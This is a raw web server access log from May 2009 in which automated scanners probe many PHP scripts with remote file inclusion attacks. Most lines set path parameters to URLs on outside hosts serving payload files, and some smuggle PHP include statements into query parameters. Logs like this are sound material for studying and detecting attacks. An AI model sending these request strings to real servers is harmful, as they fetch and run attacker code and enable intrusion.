203.24.89.21 - - [25/May/2009:03:41:05 -0400] "GET /logs/access_log.Q109051800//include/print_category.php?setup[use_category]=1&dir=http://dr-nokia.org.ua/media/idxx.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
203.24.89.21 - - [25/May/2009:03:41:08 -0400] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://dr-nokia.org.ua/media/idxx.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
66.223.51.15 - - [25/May/2009:03:41:11 -0400] "GET //include/write.php?dir=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
66.223.51.15 - - [25/May/2009:03:41:11 -0400] "GET /logs//include/write.php?dir=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
66.223.51.15 - - [25/May/2009:03:41:12 -0400] "GET /logs/access_log.Q109013000%20%20//include/write.php?dir=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
66.223.51.15 - - [25/May/2009:03:41:14 -0400] "GET //include/write.php?dir=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
66.223.51.15 - - [25/May/2009:03:41:14 -0400] "GET /logs//include/write.php?dir=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
66.223.51.15 - - [25/May/2009:03:41:14 -0400] "GET /logs/access_log.Q109013000//include/write.php?dir=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
66.223.51.15 - - [25/May/2009:03:41:14 -0400] "GET /logs/access_log.Q108112300%20%20//include/write.php?dir=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
208.64.202.134 - - [25/May/2009:03:41:18 -0400] "GET /logs/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 200 2758 "-" "Mozilla/5.0"
66.223.51.15 - - [25/May/2009:03:41:20 -0400] "GET /logs/access_log.Q108112300//include/write.php?dir=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
66.223.51.15 - - [25/May/2009:03:41:30 -0400] "GET /logs/access_log.Q109050900//include/write.php?dir=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
66.223.51.15 - - [25/May/2009:03:41:30 -0400] "GET //include/write.php?dir=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
66.223.51.15 - - [25/May/2009:03:41:31 -0400] "GET /logs//include/write.php?dir=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
66.223.51.15 - - [25/May/2009:03:41:39 -0400] "GET /logs/access_log.Q109051100//include/write.php?dir=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
209.59.12.99 - - [25/May/2009:03:41:42 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
110.45.145.92 - - [25/May/2009:03:41:47 -0400] "GET //include/write.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
110.45.145.92 - - [25/May/2009:03:41:47 -0400] "GET /logs//include/write.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
110.45.145.92 - - [25/May/2009:03:41:47 -0400] "GET /logs/access_log.Q109051800//include/write.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
208.64.202.134 - - [25/May/2009:03:41:52 -0400] "GET /logs/error_log.Q108052600/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
208.64.202.134 - - [25/May/2009:03:41:52 -0400] "GET /?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
208.64.202.134 - - [25/May/2009:03:41:52 -0400] "GET /logs/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 200 2758 "-" "Mozilla/5.0"
110.45.145.92 - - [25/May/2009:03:42:00 -0400] "GET //include/write.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
110.45.145.92 - - [25/May/2009:03:42:00 -0400] "GET /logs//include/write.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
110.45.145.92 - - [25/May/2009:03:42:00 -0400] "GET /logs/access_log.Q109051800%20%20//include/write.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
110.45.145.92 - - [25/May/2009:03:42:08 -0400] "GET /logs/access_log.Q109021500%20%20//include/write.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
216.151.134.36 - - [25/May/2009:03:42:13 -0400] "GET //include/write.php?dir=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
216.151.134.36 - - [25/May/2009:03:42:13 -0400] "GET /logs/access_log.Q109051800%20%20//include/write.php?dir=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
216.151.134.36 - - [25/May/2009:03:42:13 -0400] "GET /logs//include/write.php?dir=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
208.64.202.134 - - [25/May/2009:03:42:31 -0400] "GET /logs/access_log.Q109051800/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
216.151.134.36 - - [25/May/2009:03:42:32 -0400] "GET /logs/access_log.Q108112300%20%20//include/write.php?dir=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
110.45.145.92 - - [25/May/2009:03:42:32 -0400] "GET //include/write.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
110.45.145.92 - - [25/May/2009:03:42:32 -0400] "GET /logs//include/write.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
110.45.145.92 - - [25/May/2009:03:42:32 -0400] "GET /logs/access_log.Q109051800//include/write.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
110.45.145.92 - - [25/May/2009:03:42:48 -0400] "GET /logs//include/write.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
110.45.145.92 - - [25/May/2009:03:42:48 -0400] "GET //include/write.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
110.45.145.92 - - [25/May/2009:03:42:48 -0400] "GET /logs/access_log.Q109051800//include/write.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
58.227.193.198 - - [25/May/2009:03:42:52 -0400] "GET //include/write.php?dir=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
58.227.193.198 - - [25/May/2009:03:42:52 -0400] "GET /logs//include/write.php?dir=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
58.227.193.198 - - [25/May/2009:03:43:02 -0400] "GET /logs/access_log.Q109051800//include/write.php?dir=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
58.227.193.198 - - [25/May/2009:03:43:02 -0400] "GET //include/write.php?dir=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
58.227.193.198 - - [25/May/2009:03:43:02 -0400] "GET /logs//include/write.php?dir=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
58.227.193.198 - - [25/May/2009:03:43:12 -0400] "GET /logs/access_log.Q109051800%20%20//include/write.php?dir=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
58.227.193.198 - - [25/May/2009:03:43:12 -0400] "GET /logs/access_log.Q108112300%20%20//include/write.php?dir=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
66.223.51.15 - - [25/May/2009:03:43:26 -0400] "GET /logs//include/write.php?dir=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
66.223.51.15 - - [25/May/2009:03:43:26 -0400] "GET //include/write.php?dir=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
66.223.51.15 - - [25/May/2009:03:43:27 -0400] "GET /logs/access_log.Q109050900//include/write.php?dir=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:43:30 -0400] "GET /logs/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 200 2758 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:43:30 -0400] "GET /logs/access_log.Q108062800/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:43:30 -0400] "GET /?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:43:30 -0400] "GET /logs/error_log.Q108052600/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
66.223.51.15 - - [25/May/2009:03:43:34 -0400] "GET /logs/access_log.Q109051100//include/write.php?dir=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
221.139.104.104 - - [25/May/2009:03:43:41 -0400] "GET /logs//skin/zero_vote/login.php?dir=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
221.139.104.104 - - [25/May/2009:03:43:41 -0400] "GET //skin/zero_vote/login.php?dir=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
221.139.104.104 - - [25/May/2009:03:43:41 -0400] "GET /logs/access_log.Q109050700//skin/zero_vote/login.php?dir=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
58.227.193.198 - - [25/May/2009:03:43:49 -0400] "GET /logs/access_log.Q108091400//include/write.php?dir=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
60.249.255.172 - - [25/May/2009:03:44:07 -0400] "GET //include/write.php?dir=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
70.85.249.226 - - [25/May/2009:03:44:33 -0400] "GET /logs///?zb_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 200 2764 "-" "Mozilla/5.0"
70.85.249.226 - - [25/May/2009:03:44:33 -0400] "GET /logs/access_log.Q109051100%20%20///?zb_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
70.85.249.226 - - [25/May/2009:03:44:33 -0400] "GET ///?zb_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:03:44:53 -0400] "GET /logs/access_log.Q109051800///vwar/backup/errors.php?error=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
221.139.104.104 - - [25/May/2009:03:45:25 -0400] "GET /logs/access_log.Q109050300//skin/zero_vote/login.php?dir=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
221.139.104.104 - - [25/May/2009:03:45:32 -0400] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
221.139.104.104 - - [25/May/2009:03:45:32 -0400] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
58.227.193.198 - - [25/May/2009:03:46:31 -0400] "GET /logs/error_log.Q108102700%20%20//config.inc.php?config[root_dir]=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
58.227.193.198 - - [25/May/2009:03:46:31 -0400] "GET //config.inc.php?config[root_dir]=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
58.227.193.198 - - [25/May/2009:03:46:31 -0400] "GET /logs//config.inc.php?config[root_dir]=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
207.182.143.50 - - [25/May/2009:03:46:31 -0400] "GET /logs/access_log.Q108052200/?sourcedir=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
209.59.12.99 - - [25/May/2009:03:46:43 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
208.64.202.134 - - [25/May/2009:03:47:14 -0400] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
208.64.202.134 - - [25/May/2009:03:47:14 -0400] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
208.64.202.134 - - [25/May/2009:03:47:14 -0400] "GET /logs/error_log.Q108103000%20%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
58.227.193.198 - - [25/May/2009:03:47:14 -0400] "GET /logs/access_log.Q109042200%20%20//config.inc.php?config[root_dir]=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
194.214.239.83 - - [25/May/2009:03:48:46 -0400] "GET /logs/access_log.Q109021900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight='.include($_GET%5Ba%5D),exit.'&a=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.0" 404 235 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
194.214.239.83 - - [25/May/2009:03:48:46 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight='.include($_GET%5Ba%5D),exit.'&a=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.0" 404 208 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
194.214.239.83 - - [25/May/2009:03:48:46 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight='.include($_GET%5Ba%5D),exit.'&a=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.0" 404 213 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
194.214.239.83 - - [25/May/2009:03:49:59 -0400] "GET /logs/access_log.Q108120400//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight='.include($_GET%5Ba%5D),exit.'&a=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.0" 404 235 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
88.84.130.178 - - [25/May/2009:03:50:30 -0400] "GET /logs/access_log.Q109050300//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
88.84.130.178 - - [25/May/2009:03:50:33 -0400] "GET /logs/access_log.Q108091400//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
64.202.102.41 - - [25/May/2009:03:50:37 -0400] "GET /logs/error_log.Q109050500%20%20//function.inc.php?REX[INCLUDE_PATH]=http://www.van-long.de//components/com_joomlapack/.dat/fx29id.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
64.202.102.41 - - [25/May/2009:03:50:37 -0400] "GET /logs//function.inc.php?REX[INCLUDE_PATH]=http://www.van-long.de//components/com_joomlapack/.dat/fx29id.txt??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
64.202.102.41 - - [25/May/2009:03:50:37 -0400] "GET //function.inc.php?REX[INCLUDE_PATH]=http://www.van-long.de//components/com_joomlapack/.dat/fx29id.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:03:50:42 -0400] "GET /logs/access_log.Q109021900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.nw.or.kr/bbs/icon/v6.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
200.93.147.154 - - [25/May/2009:03:50:44 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.nw.or.kr/bbs/icon/v6.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
200.93.147.154 - - [25/May/2009:03:50:44 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.nw.or.kr/bbs/icon/v6.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
64.202.102.41 - - [25/May/2009:03:50:49 -0400] "GET /logs/access_log.Q109051000%20%20//function.inc.php?REX[INCLUDE_PATH]=http://www.van-long.de//components/com_joomlapack/.dat/fx29id.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
221.139.104.104 - - [25/May/2009:03:51:04 -0400] "GET /logs/access_log.Q109051800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
88.191.103.144 - - [25/May/2009:03:51:06 -0400] "GET /logs/access_log.Q108091400//modules/vwar/admin/admin.php?vwar_root=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.825"
88.191.103.144 - - [25/May/2009:03:51:06 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.825"
88.191.103.144 - - [25/May/2009:03:51:06 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.825"
88.84.128.40 - - [25/May/2009:03:51:29 -0400] "GET /logs/access_log.Q108091400//modules/vwar/admin/admin.php?vwar_root=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.803"
88.84.128.40 - - [25/May/2009:03:51:30 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.803"
88.84.128.40 - - [25/May/2009:03:51:30 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.803"
209.59.12.99 - - [25/May/2009:03:51:42 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.93.147.154 - - [25/May/2009:03:52:13 -0400] "GET /logs/access_log.Q108120400//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.nw.or.kr/bbs/icon/v6.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
200.93.147.154 - - [25/May/2009:03:52:40 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
200.93.147.154 - - [25/May/2009:03:52:41 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
216.176.196.171 - - [25/May/2009:03:53:16 -0400] "GET /logs/access_log.Q108091400//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 277 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
216.176.196.171 - - [25/May/2009:03:53:16 -0400] "GET /logs/access_log.Q108091400//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 277 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
216.176.196.171 - - [25/May/2009:03:53:16 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 250 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
216.176.196.171 - - [25/May/2009:03:53:17 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 250 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
88.191.103.144 - - [25/May/2009:03:53:39 -0400] "GET /logs/access_log.Q109051000//modules/vwar/admin/admin.php?vwar_root=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.825"
64.202.102.41 - - [25/May/2009:03:53:45 -0400] "GET /logs/error_log.Q109050500//function.inc.php?REX[INCLUDE_PATH]=http://www.van-long.de//components/com_joomlapack/.dat/fx29id.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
64.202.102.41 - - [25/May/2009:03:53:49 -0400] "GET /logs/access_log.Q109051000//function.inc.php?REX[INCLUDE_PATH]=http://www.van-long.de//components/com_joomlapack/.dat/fx29id.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:03:53:51 -0400] "GET /logs/access_log.Q108120400//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
216.176.196.171 - - [25/May/2009:03:54:13 -0400] "GET /logs/access_log.Q108091400//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 277 "-" "libwww-perl/5.79"
216.176.196.171 - - [25/May/2009:03:54:13 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
216.176.196.171 - - [25/May/2009:03:54:13 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.79"
216.176.196.171 - - [25/May/2009:03:54:32 -0400] "GET /logs/access_log.Q108091400//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 277 "-" "libwww-perl/5.79"
216.176.196.171 - - [25/May/2009:03:54:33 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
216.176.196.171 - - [25/May/2009:03:54:33 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.79"
88.84.128.40 - - [25/May/2009:03:54:50 -0400] "GET /logs/access_log.Q109051000//modules/vwar/admin/admin.php?vwar_root=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.803"
58.227.193.198 - - [25/May/2009:03:54:58 -0400] "GET /logs/error_log.Q109050400//config.inc.php?config[root_dir]=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
58.227.193.198 - - [25/May/2009:03:55:05 -0400] "GET /logs/error_log.Q109051300//config.inc.php?config[root_dir]=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
216.176.196.171 - - [25/May/2009:03:55:41 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
216.176.196.171 - - [25/May/2009:03:55:41 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
210.240.12.4 - - [25/May/2009:03:56:23 -0400] "GET /logs//function.inc.php?REX[INCLUDE_PATH]=http://www.van-long.de//components/com_joomlapack/.dat/fx29id.txt??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
210.240.12.4 - - [25/May/2009:03:56:23 -0400] "GET //function.inc.php?REX[INCLUDE_PATH]=http://www.van-long.de//components/com_joomlapack/.dat/fx29id.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
210.240.12.4 - - [25/May/2009:03:56:23 -0400] "GET /logs/error_log.Q109050500%20%20//function.inc.php?REX[INCLUDE_PATH]=http://www.van-long.de//components/com_joomlapack/.dat/fx29id.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
194.214.239.83 - - [25/May/2009:03:56:32 -0400] "GET /logs/access_log.Q109050300//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight='.include($_GET%5Ba%5D),exit.'&a=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.0" 404 235 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
209.59.12.99 - - [25/May/2009:03:56:42 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
216.119.103.12 - - [25/May/2009:03:56:46 -0400] "GET /logs/access_log.Q109051100%20%20/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 295 "-" "Mozilla/5.0"
